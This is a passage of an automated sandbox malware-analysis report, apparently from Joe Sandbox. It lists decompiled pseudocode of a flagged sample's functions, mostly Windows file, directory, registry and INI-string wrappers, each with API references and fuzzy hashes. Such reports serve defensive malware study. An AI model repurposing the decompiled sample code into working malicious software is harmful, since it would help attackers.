                                                                        					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                                        				}
                                                                        				return _t7;
                                                                        			}





                                                                        0x00406138
                                                                        0x0040613e
                                                                        0x00406143
                                                                        0x0040614c
                                                                        0x0040614c
                                                                        0x00406155

                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                        • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                        • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405C16(WCHAR* _a4) {
                                                                        				int _t2;
                                                                        
                                                                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                        				if(_t2 == 0) {
                                                                        					return GetLastError();
                                                                        				}
                                                                        				return 0;
                                                                        			}




                                                                        0x00405c1c
                                                                        0x00405c24
                                                                        0x00000000
                                                                        0x00405c2a
                                                                        0x00000000

                                                                        APIs
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                        • GetLastError.KERNEL32 ref: 00405C2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                        • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                        • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 19%
                                                                        			E72492B98(void* __ecx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				void* _t33;
                                                                        				void* _t37;
                                                                        				void* _t40;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				signed int _t56;
                                                                        				void* _t61;
                                                                        				void* _t70;
                                                                        				intOrPtr _t72;
                                                                        				signed int _t77;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t80;
                                                                        				void* _t81;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				void* _t89;
                                                                        				void* _t90;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t94;
                                                                        
                                                                        				if( *0x72495050 != 0 && E72492ADB(_a4) == 0) {
                                                                        					 *0x72495054 = _t93;
                                                                        					if( *0x7249504c != 0) {
                                                                        						_t93 =  *0x7249504c;
                                                                        					} else {
                                                                        						E724930C0(E72492AD5(), __ecx);
                                                                        						 *0x7249504c = _t93;
                                                                        					}
                                                                        				}
                                                                        				_t28 = E72492B09(_a4);
                                                                        				_t94 = _t93 + 4;
                                                                        				if(_t28 <= 0) {
                                                                        					L9:
                                                                        					_t29 = E72492AFD();
                                                                        					_t72 = _a4;
                                                                        					_t79 =  *0x72495058;
                                                                        					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                        					 *0x72495058 = _t72;
                                                                        					E72492AF7();
                                                                        					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                                                        					 *0x72495034 = _t33;
                                                                        					 *0x72495038 = _t79;
                                                                        					if( *0x72495050 != 0 && E72492ADB( *0x72495058) == 0) {
                                                                        						 *0x7249504c = _t94;
                                                                        						_t94 =  *0x72495054;
                                                                        					}
                                                                        					_t80 =  *0x72495058;
                                                                        					_a4 = _t80;
                                                                        					 *0x72495058 =  *((intOrPtr*)(E72492AFD() + _t80));
                                                                        					_t37 = E72492AE9(_t80);
                                                                        					_pop(_t81);
                                                                        					if(_t37 != 0) {
                                                                        						_t40 = E72492B09(_t81);
                                                                        						if(_t40 > 0) {
                                                                        							_push(_t40);
                                                                        							_push(E72492B14() + _a4 + _v8);
                                                                        							_push(E72492B1E());
                                                                        							if( *0x72495050 <= 0 || E72492ADB(_a4) != 0) {
                                                                        								_pop(_t88);
                                                                        								_pop(_t45);
                                                                        								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                        								if(__eflags == 0) {
                                                                        								}
                                                                        								asm("loop 0xfffffff5");
                                                                        							} else {
                                                                        								_pop(_t89);
                                                                        								_pop(_t49);
                                                                        								 *0x7249504c =  *0x7249504c +  *(_t89 + _t49) * 4;
                                                                        								asm("loop 0xffffffeb");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t107 =  *0x72495058;
                                                                        					if( *0x72495058 == 0) {
                                                                        						 *0x7249504c = 0;
                                                                        					}
                                                                        					E72492B42(_t107, _a4,  *0x72495034,  *0x72495038);
                                                                        					return _a4;
                                                                        				}
                                                                        				_push(E72492B14() + _a4);
                                                                        				_t56 = E72492B1A();
                                                                        				_v8 = _t56;
                                                                        				_t77 = _t28;
                                                                        				_push(_t68 + _t56 * _t77);
                                                                        				_t70 = E72492B26();
                                                                        				_t87 = E72492B22();
                                                                        				_t90 = E72492B1E();
                                                                        				_t61 = _t77;
                                                                        				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                        					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                        				asm("loop 0xfffffff1");
                                                                        				goto L9;
                                                                        			}

























                                                                        0x72492ba8
                                                                        0x72492bb9
                                                                        0x72492bc6
                                                                        0x72492bda
                                                                        0x72492bc8
                                                                        0x72492bcd
                                                                        0x72492bd2
                                                                        0x72492bd2
                                                                        0x72492bc6
                                                                        0x72492be3
                                                                        0x72492be8
                                                                        0x72492bee
                                                                        0x72492c32
                                                                        0x72492c32
                                                                        0x72492c37
                                                                        0x72492c3c
                                                                        0x72492c42
                                                                        0x72492c44
                                                                        0x72492c4a
                                                                        0x72492c57
                                                                        0x72492c59
                                                                        0x72492c5e
                                                                        0x72492c6b
                                                                        0x72492c7e
                                                                        0x72492c84
                                                                        0x72492c8a
                                                                        0x72492c8b
                                                                        0x72492c91
                                                                        0x72492c9d
                                                                        0x72492ca3
                                                                        0x72492cab
                                                                        0x72492cac
                                                                        0x72492caf
                                                                        0x72492cba
                                                                        0x72492cbc
                                                                        0x72492cc8
                                                                        0x72492cce
                                                                        0x72492cd6
                                                                        0x72492d02
                                                                        0x72492d03
                                                                        0x72492d05
                                                                        0x72492d09
                                                                        0x72492d09
                                                                        0x72492d10
                                                                        0x72492ce6
                                                                        0x72492ce6
                                                                        0x72492ce7
                                                                        0x72492cf5
                                                                        0x72492cfe
                                                                        0x72492cfe
                                                                        0x72492cd6
                                                                        0x72492cba
                                                                        0x72492d12
                                                                        0x72492d19
                                                                        0x72492d1b
                                                                        0x72492d1b
                                                                        0x72492d34
                                                                        0x72492d42
                                                                        0x72492d42
                                                                        0x72492bf9
                                                                        0x72492bfa
                                                                        0x72492bff
                                                                        0x72492c03
                                                                        0x72492c08
                                                                        0x72492c1c
                                                                        0x72492c1d
                                                                        0x72492c1e
                                                                        0x72492c20
                                                                        0x72492c25
                                                                        0x72492c27
                                                                        0x72492c27
                                                                        0x72492c2a
                                                                        0x72492c30
                                                                        0x00000000

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00000000), ref: 72492C57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 22ace0181a0632af2ecf119ed43a0ac976eac359b908d7761b854fb25fb56e6f
                                                                        • Instruction ID: abc6220bcc374a0eddf4803d67cf4a28a17095b8ee83993a80bf85628ac7f434
                                                                        • Opcode Fuzzy Hash: 22ace0181a0632af2ecf119ed43a0ac976eac359b908d7761b854fb25fb56e6f
                                                                        • Instruction Fuzzy Hash: 0A418C73940204DFDB19DF6ED985B593FB8EB55314F32882EE885EA200D6389492CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 33%
                                                                        			E00402891(intOrPtr __edx, void* __eflags) {
                                                                        				long _t8;
                                                                        				long _t10;
                                                                        				LONG* _t12;
                                                                        				void* _t14;
                                                                        				intOrPtr _t15;
                                                                        				void* _t16;
                                                                        				void* _t19;
                                                                        
                                                                        				_t15 = __edx;
                                                                        				_pop(ds);
                                                                        				if(__eflags != 0) {
                                                                        					_t8 = E00402D84(2);
                                                                        					_pop(_t14);
                                                                        					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                                        					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                                        					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                                        						_push(_t10);
                                                                        						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                        						E004065AF();
                                                                        					}
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
                                                                        				return 0;
                                                                        			}










                                                                        0x00402891
                                                                        0x00402891
                                                                        0x00402892
                                                                        0x0040289a
                                                                        0x0040289f
                                                                        0x004028a0
                                                                        0x004028af
                                                                        0x004028b8
                                                                        0x004028be
                                                                        0x00402ba1
                                                                        0x00402ba4
                                                                        0x00402ba4
                                                                        0x004028b8
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointerwsprintf
                                                                        • String ID:
                                                                        • API String ID: 327478801-0
                                                                        • Opcode ID: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                                        • Instruction ID: 25e331afd2345d3cd5f25c8269d0b77429ab830f022e4fbb565c81036e55150a
                                                                        • Opcode Fuzzy Hash: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                                        • Instruction Fuzzy Hash: 16E09271904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D0DA794D119B2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004023B2(int __eax, WCHAR* __ebx) {
                                                                        				WCHAR* _t11;
                                                                        				WCHAR* _t13;
                                                                        				void* _t17;
                                                                        				int _t21;
                                                                        
                                                                        				_t11 = __ebx;
                                                                        				_t5 = __eax;
                                                                        				_t13 = 0;
                                                                        				if(__eax != __ebx) {
                                                                        					__eax = E00402DA6(__ebx);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                        					_t13 = E00402DA6(0x11);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                        					_t11 = E00402DA6(0x22);
                                                                        				}
                                                                        				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                        				_t21 = _t5;
                                                                        				if(_t21 == 0) {
                                                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
                                                                        				return 0;
                                                                        			}







                                                                        0x004023b2
                                                                        0x004023b2
                                                                        0x004023b4
                                                                        0x004023b8
                                                                        0x004023bb
                                                                        0x004023c0
                                                                        0x004023c5
                                                                        0x004023ce
                                                                        0x004023ce
                                                                        0x004023d3
                                                                        0x004023dc
                                                                        0x004023dc
                                                                        0x004023e9
                                                                        0x004015b4
                                                                        0x004015b6
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringWrite
                                                                        • String ID:
                                                                        • API String ID: 390214022-0
                                                                        • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                        • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                        • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                        • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                        				void* _t7;
                                                                        				long _t8;
                                                                        				void* _t9;
                                                                        
                                                                        				_t7 = E00406454(_a4,  &_a12);
                                                                        				if(_t7 != 0) {
                                                                        					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 = 6;
                                                                        				return _t9;
                                                                        			}






                                                                        0x0040650d
                                                                        0x00406516
                                                                        0x0040652c
                                                                        0x00000000
                                                                        0x0040652c
                                                                        0x0040651a
                                                                        0x00000000

                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                        • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                        • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                        • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                        				int _t7;
                                                                        				long _t11;
                                                                        
                                                                        				_t11 = _a12;
                                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}





                                                                        0x0040620e
                                                                        0x0040621e
                                                                        0x00406226
                                                                        0x00000000
                                                                        0x0040622d
                                                                        0x00000000
                                                                        0x0040622f

                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040EB3E,0040CEF0,00403579,0040CEF0,0040EB3E,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                        				int _t7;
                                                                        				long _t11;
                                                                        
                                                                        				_t11 = _a12;
                                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}





                                                                        0x004061df
                                                                        0x004061ef
                                                                        0x004061f7
                                                                        0x00000000
                                                                        0x004061fe
                                                                        0x00000000
                                                                        0x00406200

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                        • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                        • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004023F4(short __ebx) {
                                                                        				short _t7;
                                                                        				WCHAR* _t8;
                                                                        				WCHAR* _t17;
                                                                        				void* _t21;
                                                                        				void* _t24;
                                                                        
                                                                        				_t7 =  *0x40a010; // 0xa
                                                                        				 *(_t21 + 8) = _t7;
                                                                        				_t8 = E00402DA6(1);
                                                                        				 *(_t21 - 0x10) = E00402DA6(0x12);
                                                                        				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
                                                                        				_t24 =  *_t17 - 0xa;
                                                                        				if(_t24 == 0) {
                                                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                        					 *_t17 = __ebx;
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                        				return 0;
                                                                        			}








                                                                        0x004023f4
                                                                        0x004023fb
                                                                        0x004023fe
                                                                        0x0040240e
                                                                        0x00402425
                                                                        0x0040242b
                                                                        0x00401751
                                                                        0x004028fc
                                                                        0x00402903
                                                                        0x00402903
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileString
                                                                        • String ID:
                                                                        • API String ID: 1096422788-0
                                                                        • Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                        • Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
                                                                        • Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                        • Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
